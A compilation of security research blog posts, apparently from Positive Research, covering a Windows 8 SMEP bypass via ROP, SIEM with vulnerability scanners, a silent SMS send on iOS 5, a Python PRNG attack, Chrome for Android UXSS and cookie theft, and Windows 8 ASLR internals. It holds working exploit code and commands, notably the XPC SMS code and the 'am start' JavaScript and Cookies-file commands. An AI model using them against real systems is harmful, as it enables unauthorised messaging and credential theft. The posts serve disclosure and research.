SMEP feature doesn’t allow executing a code from a user-mode page in supervisor mode (CPL = 0). Any attempt of executing a code under these circumstances on Windows 8 ends up with a blue screen of death with a bugcheck code “ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY”. For more details on how SMEP is implemented in Windows 8 please refer to [1].

In order to disable SMEP, the 20th bit of CR4 register has to be reset. There are two steps in bypassing SMEP — firstly, we’ll need to find out the value of CR4 register, and secondly, we’ll need a way to set a new value of CR4 register. The first step is needed because we have to preserve the original value of the other CR4 bits. The point is that various bits of this register are responsible for enabling or disabling certain processor features. The OS enables those features only once during the system startup and they are not supposed to be modified in a runtime. Modifying various bits of CR4 register can lead to undefined behavior or a system crash.

The preliminary requirement of a successful attack on SMEP is making the shellcode (or a ROP chain in our case) dynamic, that is, all of the needed code offsets have to be calculated in a runtime. For this, a certain kernel-mode information disclosure is needed, e.g. when determining the base address of a module with ROP gadgets [2]. A code for parsing PE file format is also needed to ensure that the found gadgets are located in the executable section of the exploited module.

There are two approaches that can be used for getting the value of CR4 register. The first one is using a ROP chain. There is a suitable function KiSaveInitialProcessorControlState() present in the “ntoskrnl” module. The body of this function is provided below.
KiSaveInitialProcessorControlState():
mov     rax, cr0
mov     [rcx], rax
mov     rax, cr2
mov     [rcx+8], rax
mov     rax, cr3
mov     [rcx+10h], rax
mov     rax, cr4
mov     [rcx+18h], rax
mov     rax, cr8
mov     [rcx+0A0h], rax
sgdt    fword ptr [rcx+56h]
sidt    fword ptr [rcx+66h]
str     word ptr [rcx+70h]
sldt    word ptr [rcx+72h]
stmxcsr dword ptr [rcx+74h]
retn
Listing 1. KiSaveInitialProcessorControlState() function

As we can see, this function can be successfully used for retrieving various interesting information about the processor control state. It is also not guarded with stack cookies and uses volatile registers RAX and RCX.

That’s grand!

We can fill in the values of RAX and RCX registers with another ROP gadgets just like at the end of the  HvlEndSystemInterrupt() function shown in listing 2.
HvlEndSystemInterrupt():

pop     rdx
pop     rax
pop     rcx
retn
 Listing 2. HvlEndSystemInterrupt() function ROP gadget

The problem of this method is that it depends mostly on the situation. There are certain cases when it is difficult to restore the original control flow of the exploiting program. In our case, we also need to reset the 20th bit of CR4 value, but there is no suitable ROP gadget that can be found in the “ntoskrnl” module for that, so some user mode code has to be executed which is impossible due to the fact that SMEP is still enabled. However, you can look for a suitable ROP gadget in other loaded modules in a runtime.

The other approach is to emulate the initialization of CR4 register. Most of the bits in CR4 can be set or reset with the help of “cpuid” instruction which defines supported features for the current processor. This method is more convenient although less reliable.

The second step of bypassing SMEP is using a gadget that will set the new CR4 register value. For that KiConfigureDynamicProcessor() function can be used.
KiConfigureDynamicProcessor():

mov     cr4, rax
add     rsp, 28h
retn
Listing 3. KiConfigureDynamicProcessor() function ROP gadget

Once SMEP is disabled, we can jump to the user-mode buffer with a shellcode. Luckily, there is no stack cookie security feature in the exploited ROP gadgets. Here goes out an obvious mitigation: adding a stack cookie security feature to the functions with ROP gadgets could significantly complicate SMEP bypassing using a ROP chain.


References:

[1] Artem Shishkin: Intel SMEP overview and partial bypass on Windows 8.
http://blog.ptsecurity.com/2012/09/intel-smep-overview-and-partial-bypass.html
[2] Mateusz “j00ru” Jurczyk: Windows Security Hardening Through Kernel Address Protection. http://j00ru.vexillium.org/blog/04_12_11/Windows_Kernel_Address_Protection.pdf


SIEM + scanner. Headache Pills?

$
0
0
Security systems are developed and adjusted to new threats all the time. The number of information resources, from which the data on the current security state is transferred, is getting bigger day by day. However, if you fail to detect and prevent threats timely, even hundreds of intrusion detection systems will be useless. And here the SIEM (Security Information and Event Management) systems come at help. These systems are in the focus of the article.

What is SIEM?

The SIEM system fulfills the following tasks:

  • Consolidation and storage of event logs from various resources — network devices, applications, OS logs, protection tools. Any information security standard provides technical requirements on event collection and analysis. They are needed not only to fulfill a standard requirement. There are situations when an incident is noticed too late, and events were erased long ago, or event logs are unavailable, and in fact it is impossible to find out the incident reasons. Moreover, connecting to each resource and event viewing will take too much time. Otherwise, without event analysis, there is a risk to learn about an incident in your company from the news.
  • Provision of tools for event analysis and incident investigation. Event formats differ in various resources. Text format in case of huge volumes is too tiresome; it reduces the possibility of incident detection. A part of products of the SIEM class unifies events and make them more readable, and the interface visualizes only important information events, focuses on them, allows filtering out not critical events.
  • Correlation and processing in accordance with rules. An incident cannot be judged by only one event. The simplest example is login failed — one event means nothing, but three and more such events with the same account can already indicate brute force attempts. Rules in SIEM, in the simplest case, are represented as RBR (Rule Based Reasoning) and contain a set of conditions, triggers, counters, an action script.
  • Automatic notification and incident management. The SIEM primary task is not only to collect events, but to automate the process of event detection and registration in its own log or an external system HelpDesk, and to inform about the event timely.

SIEM is able to detect:

Network attacks in internal and external perimeters
Virus epidemics or particular virus attacks, viruses not removed, backdoors and trojans
Unauthorized attempts to access confidential information
Fraud
Errors and failures in information system functioning
Vulnerabilities
Configuration errors in protection tools and information systems

The SIEM system is multipurpose due to its logic. However, for its tasks to be solved, useful correlation resources and rules are needed. Any information about an event (for instance, if a door of a particular room has opened) can be sent to the SIEM system and used.

Resources are selected on the basis of the following factors:

  • Severity of a system (value, risks) and information (processed and stored)
  • Validity and self-descriptiveness of event resources
  • Information channel coverage (not only external, but an internal network perimeter should be taken into account)
  • Solution of IT and IS tasks (ensuring continuity, incident investigation, policy compliance, information leakage prevention, etc.)

Primary SIEM resources

  • Access Control, Authentication — to control access to information systems and to use privileges
  • Event logs of servers and working stations — to control access, ensure continuity, comply with information security policies
  • Active network equipment (modification control and access, network traffic counters)
  • IDS\IPS. Notifications about network attacks, configuration changes, and device access
  • Antivirus protection. Notifications about software workability, databases, configuration and policy changes, malware
  • Vulnerability scanners. Inventory of assets, services, software, vulnerabilities, provision of inventory data and topological structure
  • GRC systems for recording of risks, threat severity, incident prioritization
  • Other systems of protection and compliance with IS policies (DLP, antifraud, device control, etc.)
  • Inventory and asset management systems — to control and detect new infrastructure assets
  • Netflow and traffic control systems

The SIEM solution usually consists of several components:

  • Agents installed on an information system under investigation (essential for operating systems; an agent is a resident program (service, demon), which collects event logs locally and transfers them to a server if possible).
  • Agents' collectors, which in fact are modules (libraries) for interpreting a particular event log or system.
  • Server collectors intended for prior event accumulation from various resources.
  • A server correlator responsible for collecting of information from collectors and agents and processing it in accordance with the rules and algorithms of correlation.
  • Database and storage server responsible for event log storing.

Event data is collected from resources with the help of the agents installed on them or remotely (using connections via NetBIOS, RPC, TFTP, FTP). The second option results in network and event resource loading, because some systems do not allow transmitting only those events, which have not been transferred yet, and transmit to SIEM the whole log weighing very often hundreds of megabytes. And it is not correct to remove a log each time when data is collected.

Events should not only be collected in a consolidated storage in case of an incident, but processed as well. Otherwise the solution will not justify your expenses. Of course, the SIEM toolset will save time needed for an incident investigation. However, SIEM is meant to detect and prevent threats timely. To fulfill this task, it is necessary to compose correlation rules taking into account company's relevant risks. These rules are not permanent and should be updated by experts all the time. Similar to intrusion detection systems, if a rule allowing detecting a typical threat is not created in a proper time, the attack is likely to be conducted. SIEM has an advantage over IDS — it is possible to specify general description of symptoms and use baseline statistics to monitor deviations from common behavior of information systems and traffic.

Its rules resemble the Snort rules vaguely. They describe threat criteria and reaction to them. I have explained the simplest example with login failed earlier. When applied, a more complicated example may be login failed in a particular information system with specification of a user group and remote object name. In case of fraud — distance parameters of two places where a bank card was last used within a small time interval (for instance, a client pays for petrol in Moscow and in 5 minutes somebody tries to withdraw 5,000 Euro in Australia).

Incident registration in its own or external HelpDesk system is not less important. First of all, incidents are documented. If an incident is registered, then there must be a person responsible for its elimination within a certain period of time. No incident will be missed (as it happens with notifications by email). Second, it provides incident statistics, which allows detecting problems (incidents of the same type, repeating incidents and incidents closed without elimination of an actual problem). Statistics and key indicators may be used to evaluate work efficiency of particular employees, IS departments, protection tools.

SIEM can help to make the threat detection process completely automated. If such a system is implemented correctly, an IS department reaches much higher level of service provision. SIEM allows paying attention only to very important threats, working not with events but with incidents, detecting abnormal behavior and risks, preventing financial losses.

It is important to realize that SIEM is not only the tool of information security but of the whole information technology. Strong correlation mechanisms can ensure continuity of IT service operation, detect outages of information and operating systems, hardware. Moreover, SIEM is a tool of automation. The most common example relevant for the majority of companies is the conflict of IP addresses. An easy RBR rule can notify about an incident long before a user call. Besides, the reasons can be eliminated with fewer costs, and therefore probable financial losses will be decreased.

Analyzing actual SIEM application, we have to accept that in the majority of cases the work of such systems is aimed at consolidation of logs from various resources. In fact, only SIEM hardware and software is used. If correlation rules have been already set, they are not updated.

SIEM and (or) vulnerability scanner

Due to some marketing publications, a myth that it is possible to protect the whole network perimeter with only one protection tool runs in the minds of integrators. You can often hear such questions as, "why do you require host IDS if it is only needed to use border ones?", "why do you want a security scanner if you have SIEM installed?", "what is the use of a vulnerability scanner, if IDS safely protects everything?" Let's check how things go in reality.

SIEM can correlate:

  • A known, described by correlation rules threat
  • A threat based on a general template
  • Abnormal behavior in case of deviation from a baseline
  • Deviation from a security policy based on the idea "everything what is not allowed is prohibited" (it is possible not in all SIEM systems)
  • Cause-effect relations if correlation algorithms such as CBR (codebook, smart), GBR (graph based), statistical, Bayesian are used

The last three algorithms are rarely applied in Russia. Not all SIEM systems can work with these correlation methods. Their use increases the cost of the system maintenance — a qualified specialist is needed to configure them, update, and maintain their workability. Of course, there are a lot of false notifications at the beginning of use. That is why companies very often just disable these detection mechanisms.
It turns out that only two simplest detection algorithms with a preset threat description are used. If a threat is new, it will not be detected. A vivid example is APT (Advanced Persistent Threat) in RSA, the developer of SIEM (uses its own system).

For the proper operation of these two algorithms, it is required to update data about threats all the time similar to IDS. As a result, threats are duplicated in IDS and SIEM (but SIEM correlation rules are updated much more rarely than IDS rules). Rules updating in the SIEM products is often missing — not all companies can afford a qualified analyst of SIEM and its rules, and besides this country lacks good specialists.

So in case of one-time configuration of correlation rules, an incident (for instance, a network attack) will be detected only if it is reported by another protection tool (IDS, for example).

Let's consider one more practical example. In case of a vulnerability, at first it can be revealed only by detecting particular criteria — software or plug-in version, various configuration parameters. You may know about a vulnerability beforehand, but you will learn the method of its exploitation detection only after the issue of a bulletin. Of course, a malware user can freely exploit this vulnerability during the whole period. All security tools will keep silent in the majority of cases, because they do not know the methods of detecting attacks exploiting this vulnerability. Even if updates and vulnerability elimination techniques have been issued, it is not always possible to fix it in a system (think of effort, testing necessity, incompatibility of different systems, sometimes it cannot be eliminated at all). Remaining risks are accumulated up to a dangerous state, but they can be and should be controlled.

Integration of a vulnerability scanner with SIEM allows combining several methods of threat detection and significantly increasing probability of timely detection. For instance, SIEM can detect an abnormal behavior through a baseline, but without information that an asset has a vulnerability SIEM will not be able to identify with what exactly this abnormal behavior is connected. If there is data from a vulnerability scanner, then SIEM will be able to conclude that this vulnerability is exploited.

With information about a vulnerability and asset severity from a vulnerability scanner, the SIEM system is able to prioritize incidents in accordance with their severity. First of all it will allow reacting to significant incidents important for business.

Vulnerability scanner is an excellent supplier of inventory information for SIEM (software versions, its configuration); this information can be used to detect an incident, to find out what it results from. For instance, the swap parameter of a file has been changed by a user company\p_kolya. The server is frequently restarted. It is quite typical, and only the SIEM system is able to reveal cause-effect relations. However, without integration with a vulnerability scanner, you will look for the reasons for quite a long time, and your company will endure financial losses because of the service delay.

Do you know all computers in your network? Do all of them belong to your company? Are all of them provided with security tools in accordance with the security policy? Are these security tools functioning and configured properly?

Use of an embedded into SIEM mechanism that checks compliance with internal policies and high-level standards without integration with a vulnerability scanner will not provide you with a complete picture, because very few technical requirements are used. A vulnerability scanner is intended not only to detect vulnerabilities, but to supply the major part of controls. You may not even once be notified about a virus, but it does not mean your antivirus protection functions correctly. You may not even have it. SIEM will never inform you that antivirus software is not installed or the option of file protection is disabled. And a vulnerability scanner can provide you not only with this but with other useful information as well.

No resource will be able to provide you with more detailed and complete information about a vulnerability in your system and possible ways of its exploitation (with regard to the network topological structure and configuration) than a vulnerability scanner. A vulnerability may be present in a system but remain unexploited (a network port is closed, a service is stopped, VLAN is organized on active network equipment, or firewall rules locked traffic to this port). Such information can reduce remaining risks, help to apply resources only to necessary protection tools and to rule out false incidents.

Configuration management process, so complicated to be implemented, becomes simple if SIEM and a vulnerability scanner are used together. You can analyze what has changed, who's made these changes and when, and you can also automatically evaluate what they've affected. You only need to compose correlation rules in SIEM and configure parameters of information forwarded from a scanner; the SIEM system will perform other logic itself.

Of course, a scanner without SIEM reduces risks and allows evaluating possible attack vectors as well. However, continuous asset scanning will increase their and network resource loading. A vulnerability can appear within an interval between scanning, and the bigger these intervals, the larger financial risks. SIEM keeps guarding your system within these intervals. The SIEM scripts allow forcing a vulnerability scanner to start running and information to be updated in case of any threat.

It is evident that the more effective information resources SIEM has, the more it is possible to detect a threat at the stage of its appearance. You can use SIEM and a vulnerability scanner separately. However, if they are used together, the risks with the hugest ROI index will be significantly minimized. This article has touched upon the simplest cases, which can be automated; when applied they are much more numerous.
Thank you for attention!

Author: Olesya Shelestova, Positive Research.

Your Flashlight Can Send SMS — One More Reason to Update up to iOS 6

$
0
0
Today I'm not going to tell you how the security system of iOS 5 is organized. We will not gather bits of information using undocumented features either. We'll just send an SMS from an application behind the user's back.

There is too little information describing low-level operations on iOS. These bits do not allow viewing the picture as a whole. A lot of header files have closed sources. The majority of steps are taken blindly. MacOS X, the mobile platform ancestor, becomes the main experimental field.

One of the systems of inter-process communication in MacOS is XPC. This system layer has been developed for inter-process communication based on transfer of plist structures using libSystem and launchd. In fact, it is an interface that allows managing processes via the exchange of such structures as dictionary. Due to heredity, iOS 5 possesses this mechanism as well.

You might already understand what I mean by this introduction. Yep, there are system services in iOS that include tools for XPC communication. And I want to exemplify the work with daemon for SMS sending. However, it should be mentioned that the vulnerability is fixed in iOS 6, but is relevant for iOS 5.0—5.1.1. Jailbreak, Private Framework, and other illegal tools are not required for its exploitation. Only the set of header files from the directory /usr/include/xpc/* is needed.

One of the elements for SMS sending in iOS is the system service com.apple.chatkit, the tasks of which include generation, management, and sending of short text messages. For the ease of control, it has the publicly available communication port com.apple.chatkit.clientcomposeserver.xpc. Using the XPC subsystem, you can generate and send messages without user's approval. 

Well, let's try to create connection.
xpc_connection_t myconnection;
 
dispatch_queue_t queue = dispatch_queue_create("com.apple.chatkit.clientcomposeserver.xpc", DISPATCH_QUEUE_CONCURRENT);
 
myconnection = xpc_connection_create_mach_service("com.apple.chatkit.clientcomposeserver.xpc", queue, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
Now we have the XPC connection myconnection to the service of SMS sending. However, XPC configuration provides for creation of suspended connections —we need to take one more step for the activation.
xpc_connection_set_event_handler(myconnection, ^(xpc_object_t event){
        xpc_type_t xtype = xpc_get_type(event);
        if(XPC_TYPE_ERROR == xtype)
        {
        NSLog(@"XPC sandbox connection error: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
        }
        // Always set an event handler. More on this later.
        
        NSLog(@"Received an message event!");
        
    });

    xpc_connection_resume(myconnection);
The connection is activated. Right at this moment iOS 6 will display a message in the telephone log that this type of communication is forbidden. Now we need to generate a dictionary similar to xpc_dictionary with the data required for the message sending.
NSArray *receipements = [NSArray arrayWithObjects:@"+7 (90*) 000-00-00", nil];
    
NSData *ser_rec = [NSPropertyListSerialization dataWithPropertyList:receipements format:200 options:0 error:NULL];

xpc_object_t mydict = xpc_dictionary_create(0, 0, 0);
xpc_dictionary_set_int64(mydict, "message-type", 0);
xpc_dictionary_set_data(mydict, "recipients", [ser_rec bytes], [ser_rec length]);
xpc_dictionary_set_string(mydict, "text", "hello from your application!");

Little is left: send the message to the XPC port and make sure it is delivered.

xpc_connection_send_message(myconnection, mydict);
xpc_connection_send_barrier(myconnection, ^{
        NSLog(@"Message has been successfully delievered");
    });
Sound of SMS sent to a short number.
So prior to elimination of this vulnerability in iOS 6, any application could send SMS without user's approval. Apple has provided iOS 6 with one more security layer, which prevents connections to the service from a sandbox.

Thank you for attention!

Author: Kirill Ermakov, Positive Research.

Random Number Security in Python

$
0
0
This is the second article devoted to the vulnerabilities of pseudorandom number generators (PRNG).
A series of publications describing the PRNG vulnerabilities from the basic ones ([1]) to vulnerabilities in various programming languages implemented in CMS and other software ([2],[3],[4]) have appeared recently.

These publications are popular because PRNG is the basis of web application security. Pseudorandom numbers/character sequences are used in web application security for:


  • Generation of different tokens (CSRF, password reset tokens, and etc.)
  • Generation of random passwords
  • Generation of a text in CAPTCHA
  • Generation of session identifiers

The previous article, relying on the research of George Argyros and Aggelos Kiayias ([3]), explained how to guess random numbers in PHP using PHPSESSID and taught various methods to reduce pseudorandom number entropy.

Now we are going to consider PRNG in web applications written in the Python language.

SPECIFIC FEATURES OF PYTHON PRNG

Python-е includes 3 modules intended for generation of random/pseudorandom numbers — random, urandom, and _random:

  • _random implements the Mersenne Twister algorithm (MT) ([6],[7]) with few changes in the C language
  • urandom uses external entropy resources (CryptGenRandom uses Windows encryption provider) in the C language
  • random is a shell for the _random module in Python-е, including both libraries and having two main functions for pseudorandom number generation — random() and SystemRandom()

RANDOM()

The first uses the MT algorithm (_random), but first of all it tries to initiate it with SEED taken from urandom, which converts PRNG to RNG (random number generator). If you fail to call urandom (say, /dev/urandom is missing or a necessary function is not called from the library advapi32.dll), then int(time.time() * 256) will be used as SEED (which, as you already know, ensures weak entropy).

SYSTEMRANDOM()

SystemRandom() calls urandom, which uses external resources for random data generation.
The MT algorithm change means that instead of a number based on one of 624 numbers from the current PRNG state (state) two numbers are used:

random_random()
{
    unsigned long a=genrand_int32(self)>>5, b=genrand_int32(self)>>6;
    return PyFloat_FromDouble((a*67108864.0+b)*(1.0/9007199254740992.0));
}

As opposed to PHP, the generator can be initiated not only with the long variable, but with any byte sequence (init_by_array() is called), this exactly happens when the random module is imported with the help of an external entropy resource (32 bytes taken from urandom), and in case it fails, time() is used:

if a is None: try:
                a = int.from_bytes(_urandom(32), 'big')
            except NotImplementedError:
                import time
a = int(time.time() * 256)

PROTECTION

It would seem the data of the change, as opposed to PHP, provides sufficient generator entropy even if random.random() is called. That's not so bad.

Python frameworks are distinguished from PHP by the fact that Python is started once together with a web server. It means that the state is initialized by default only once when the import random command is executed or when random.seed() is forced (it is very rare in web applications), which allows attacking the MT state in accordance with the following algorithm:

  • Find a script displaying the value random.random() (for instance, error logger does this in Plone (SiteErrorLog.py), it leads to a page "error with number *** is detected", where a random number is displayed).
  • Make consequently a series of requests and fix random numbers in them. Request numbers are 1,2,199,200,511,625.
  • Perform an easy-to-guess action with the 313th request (for example, generate a link to reset a password).
  • Relying on requests 1,199, define the states state_1[1], state_1[2], state_1[397].
  • Relying on requests 2,200, define the states state_1[3], state_1[398].
  • Relying on request 511state_2[397].
  • Relying on request 625state_3[1].

Accurate state determination depends on a state element index (i): for i mod 2=0 entropy is 2^6, for i mod 2 = 1 — 2^5.

Requests 1,2,199,200 help determine the states state_1[1], state_1[2], state_1[3], state_1[397], state_1[398], on the basis of which state_2[1] and state_2[2] are generated, from which random request number No. 313 is resulted. However, this number entropy is 2^24 (16M). The entropy is reduced with requests 511 and 625. These requests help calculate state_2[397], state_3[1]. It reduces the number of state options up to 2^8. It means that there are only 256 options of a "random" number used in request No. 313.

For the attack to be performed, it is necessary to prevent anybody from interfering with the requesting process and changing the PRNG state (in other words, to define state indexes correctly). It is also necessary to ensure request No. 1 to use PRNG state elements with indexes not higher than 224, otherwise request No. 200 will use another generator state, which will corrupt the algorithm functioning. It is 36% possible.
That is why an additional task of request No. 625 is to determine that all previous requests have been made in the necessary states and nobody has interfered with the requesting process.

In addition, here is a script, which receives random numbers of 6 requests at the input. All possible random numbers of request No. 313 are generated at exit.

PRACTICAL APPLICATION

We analyzed several frameworks and web applications in the Python language (including Plone and Django). Unfortunately (but maybe fortunately), we couldn't find vulnerable ones among them.

The most anticipated target is Plone as random numbers can be displayed in it (SiteErrorLog.py), but the attack problem is the following:

Plone functions under Python 2.7.*, which cuts the last 5 numbers when float is converted to str(). It sufficiently broadens the number of options (including local bruteforce and external requests to the server).
Python of the third branch does not cut float in the st()r function, which makes its applications the most vulnerable to attacks.

Here is a script, which receives 6 random numbers at input (initiated by the state with necessary indexes, for instance, from the test script vuln.py), and generates possible options of this random number at exit. It takes about an hour on an "average" computer.

Note: this script does not take into account the error of element state determination for (i mod 2 = 1), that is why the script efficiency reduces from 36% to 18%.

CONCLUSION

The specific features of the framework code execution (web server side) allow an attacker to conduct attacks impossible or hardly implemented in the PHP language. It is required to follow simple rules to protect PRNG:
  • Use the urandom module or the random.SystemRandom() function.
  • Initiate with the help of random.seed() prior to each random.random() call with sufficient SEED entropy (if it is impossible to use urandom, you can use, for example, the value of the function md5(time.time()*(int)salt1+str(salt2)) as SEED, where salt1 and salt2 are initiated in the course of web application installation).
  • Restrict random number displaying in your web application (you only need to use such hash functions as md5).

LINKS

[1] http://blog.ptsecurity.com/2012/08/not-so-random-numbers-take-two.html [ru]
[2] http://jazzy.id.au/default/2010/09/20/cracking_random_number_generators_part_1.html
[3] http://crypto.di.uoa.gr/CRYPTO.SEC/Randomness_Attacks_files/paper.pdf
[4] http://www.slideshare.net/d0znpp/dcg7812-cryptographyinwebapps-14052863 
[5] http://media.blackhat.com/bh-us-10/presentations/Kamkar/BlackHat-USA-2010-Kamkar-How-I-Met-Your-Girlfriend-slides.pdf
[6] http://en.wikipedia.org/wiki/Mersenne_twister
[7] http://jazzy.id.au/default/2010/09/22/cracking_random_number_generators_part_3.html 

Google Chrome for Android — UXSS and Credential Disclosure

$
0
0
Here we go.
In July 2011, Roee Hay and Yair Amit from the IBM Research Group found the UXSS vulnerability in the default Android browser. This bug allows a malicious application to insert JavaScript code in the context of an arbitrary domain and stole Cookies or to do some evil things. Anyway, this bug was fixed in Android 2.3.5.

On June 21, 2012, Google Chrome for Android was released. I’ve found some interesting bugs there. Just have a look.

UXSS

As expected, the main Chrome activity isn't affected by this vulnerability. However, let’s view the AndroidManifest.xml file from Chrome .apk.


You can see that the class com.google.android.apps.chrome.SimpleChromeActivity can be called from another application, since it has the directive declared.

Decompile classes.dex from apk and look at the SimpleChromeActivity class.


The onCreate method provided above shows that a new URL will be loaded in the current tab without opening a new tab.

Here is a couple of ways to start this activity — via Android API or Activity Manager. Calls from Android API are a bit complicated, so I used "am" command from the adb shell.

shell@android:/ $ am start -n com.android.chrome/com.google.android.apps.chrome.SimpleChromeActivity -d 'http://www.google.ru'


I think here is a non-security problem with content displaying. As we can judge by the title, Chrome loaded www.google.ru in SimpleChromeActivity instead of Main, and this activity has access to the Chrome Cookies database. The next step is injecting JavaScript code.

shell@android:/ $ am start -n com.android.chrome/com.google.android.apps.chrome.SimpleChromeActivity -d 'javascript:alert(document.cookie)'


Voilà, JavaScript has been executed in the context of the domain www.google.ru.

CREDENTIAL DISCLOSURE

Another problem — automatic file downloading — was a real headache for all Chrome-like browsers. If you opened a binary file in the Chrome browser, it was downloaded without your approval to the SDCard directory. The same thing happened with a default browser, where this "feature" was used by NonCompatible malware. So you may ask what it has to do with credential disclosure. Look at the Chrome directory on the system.



These files (such as Cookies, History, etc) can be read only by Chrome app. It looks secure. Try to launch Chrome using the file:// wrapper and open the Cookies file.

shell@android:/ $ am start -n com.android.chrome/com.android.chrome.Main -d 'file:///data/data/com.android.chrome/app_chrome/Default/Cookies'


When the browser starts, Cookies are downloaded/copied to /sdcard/Downloads/Cookies.bin and can be read by any application of the system.

I provided detailed information to the Chromium security team, and these bugs were fixed in version 18.0.1025308.

Links:
http://code.google.com/p/chromium/issues/detail?id=138035
http://code.google.com/p/chromium/issues/detail?id=138210

Author: Artem Chaykin, Positive Research.

Workshop «Random Numbers. Take Two» at ZeroNights 2012


Attacking MongoDB

$
0
0
Mikhail Firstov, an expert at Positive Technologies, spoke at ZeroNights 2012, which lately took place in Moscow. The talk was about attacking a popular DBMS — MongoDB.

The presentation and attack video demo are under the cut.


REST:



Sniff:



Github.

Windows 8 ASLR Internals

$
0
0
Authors: Artem Shishkin and Ilya Smith, Positive Research.

ASLR stands for Address Space Layout Randomization. It is a security mechanism which involves randomization of the virtual memory addresses of various data structures, which may be attacked. It is difficult to predict where the target structure is located in the memory, and thus an attacker has small chances to succeed.

ASLR implementation on Windows is closely related to the image relocation mechanism. In fact, relocation allows a PE file to be loaded not only at the fixed preferred image base. The PE file relocation section is a key structure for the relocating process. It describes how to modify certain code and data elements of the executable to ensure its proper functioning at another image base.

The key part of ASLR is a random number generator subsystem and a couple of stub functions that modify the image base of a PE file, which is going to be loaded.

Windows 8 ASRL relies on a random number generator, which is actually a Lagged Fibonacci Generator with parameters j=24 and k=55 and which is seeded at Windows startup in the winload.exe module. Winload.exe gathers entropy at boot time and has different sources: registry keys, TPM, Time, ACPI, and a new rdrand CPU instruction. Windows kernel random number generator and its initialization are described in detail in [1].

We would like to give a small note about the new rdrand CPU instruction. The Ivy Bridge architecture of Intel processors has introduced the Intel Secure Key technology for generating high-quality pseudo-random numbers. It consists of a hardware digital random number generator (DRNG) and a new instruction rdrand, which is used to retrieve values from DRNG programmatically.

As a hardware unit, DRNG is a separate module on a processor chip. It operates asynchronously with the main processor cores at the frequency of 3 GHz. DRNG uses thermal noise as an entropy source. It also has a built-in testing system performing a series of tests to ensure high quality output. If one of these tests fails, DRNG refuses to generate random numbers at all.

The RDRAND instruction is used to retrieve random numbers from DRNG. The documentation states that theoretically DRNG can return nulls instead of random number sequence due to health test failure or if a generated random number queue is empty. However, we were unable to drain the DRNG in practice.
Intel Secure Key is a really powerful random number generator producing high quality random numbers at a very high speed. Unlike other entropy sources, it is practically impossible to guess the initial RNG state initialized with rdrand instruction.

The internal RNG interface function is ExGenRandom(). It also has an exported wrapper function RtlRandomEx(). Windows 8 ASLR uses this function as opposed to the previous version that relied on the rdtsc instruction. The rdtsc instruction is used for retrieving a timestamp counter on a CPU, which changes linearly so that it cannot be considered a secure random number generator.

The core function of the ASLR mechanism is MiSelectImageBase. It has the following pseudocode on Windows 8.
#define MI_64K_ALIGN(x)(x +0x0F)>>4
#define MmHighsetUserAddress 0x7FFFFFEFFFF

typedef PIMAGE_BASE ULONG_PTR;

typedef enum _MI_MEMORY_HIGHLOW{
    MiMemoryHigh    =0,
    MiMemoryLow     =1,
    MiMemoryHighLow =2} MI_MEMORY_HIGHLOW,*PMI_MEMORY_HIGHLOW;


MI_MEMORY_HIGHLOW MiSelectBitMapForImage(PSEGMENT pSeg){if(!(pSeg->SegmentFlags & FLAG_BINARY32))// WOW binary{if(!(pSeg->ImageInformation->ImageFlags & FLAG_BASE_BELOW_4GB)){if(pSeg->BasedAddress >0x100000000){return MiMemoryHighLow;}else{return MiMemoryLow;}}}return MiMemoryHigh;}

PIMAGE_BASE MiSelectImageBase(void* a1<rcx>, PSEGMENT pSeg){
    MI_MEMORY_HIGHLOW ImageBitmapType;
    ULONG ImageBias;
    RTL_BITMAP *pImageBitMap;
    ULONG_PTR ImageTopAddress;
    ULONG RelocationSizein64k;
    MI_SECTION_IMAGE_INFORMATION *pImageInformation;
    ULONG_PTR RelocDelta;
    PIMAGE_BASE Result = NULL;// rsi = rcx// rcx = rdx// rdi = rdx

    pImageInformation = pSeg->ImageInformation;
    ImageBitmapType = MiSelectBitMapForImage(pSeg);

    a1->off_40h = ImageBitmapType;if(ImageBitmapType == MiMemoryLow){// 64-bit executable with image base below 4 GB
        ImageBias = MiImageBias64Low;
        pImageBitMap = MiImageBitMap64Low;
        ImageTopAddress =0x78000000;}else{if(ImageBitmapType == MiMemoryHighLow){// 64-bit executable with image base above 4 GB
            ImageBias = MiImageBias64High;
            pImageBitMap = MiImageBitMap64High;
            ImageTopAddress =0x7FFFFFE0000;}else{// MiMemoryHigh 32-bit executable image
            ImageBias = MiImageBias;
            pImageBitMap = MiImageBitMap;
            ImageTopAddress =0x78000000;}}// pSeg->ControlArea->BitMap ^= (pSeg->ControlArea->BitMap ^ (ImageBitmapType << 29)) & 0x60000000;// or bitfield form
    pSeg->ControlArea.BitMap = ImageBitmapType;

    RelocationSizein64k = MI_64K_ALIGN(pSeg->TotalNumberOfPtes);if(pSeg->ImageInformation->ImageCharacteristics & IMAGE_FILE_DLL){
        ULONG StartBit =0;
        ULONG GlobalRelocStartBit =0;

        StartBit = RtlFindClearBits(pImageBitMap, RelocationSizein64k, ImageBias);if(StartBit !=0xFFFFFFFF){
            StartBit = MiObtainRelocationBits(pImageBitMap, RelocationSizein64k, StartBit,0);if(StartBit !=0xFFFFFFFF){
                Result = ImageTopAddress -(((RelocationSizein64k)+ StartBit)<<0x10);if(Result ==(pSeg->BasedAddress - a1->SelectedBase)){
                    GlobalRelocStartBit = MiObtainRelocationBits(pImageBitMap, RelocationSizein64k, StartBit,1);
                    StartBit =(GlobalRelocStartBit !=0xFFFFFFFF) ? GlobalRelocStartBit : StartBit;
                    Result = ImageTopAddress -(RelocationSizein64k + StartBit)<<0x10;}

                a1->RelocStartBit = StartBit;
                a1->RelocationSizein64k = RelocationSizein64k;
                pSeg->ControlArea->ImageRelocationStartBit = StartBit;
                pSeg->ControlArea->ImageRelocationSizeIn64k = RelocationSizein64k;return Result;}}}else{// EXE imageif(a1->SelectedBase != NULL){return pSeg->BasedAddress;}if(ImageBitmapType == MiMemoryHighLow){
            a1->RelocStartBit =0xFFFFFFFF;
            a1->RelocationSizein64k =(WORD)RelocationSizein64k;
            pSeg->ControlArea->ImageRelocationStartBit =0xFFFFFFFF;
            pSeg->ControlArea->ImageRelocationSizeIn64k =(WORD)RelocationSizein64k;return((DWORD)(ExGenRandom(1)%(0x20001- RelocationSizein64k))+0x7F60000)<<16;}}

    ULONG RandomVal = ExGenRandom(1);
    RandomVal =(RandomVal %0xFE+1)<<0x10;

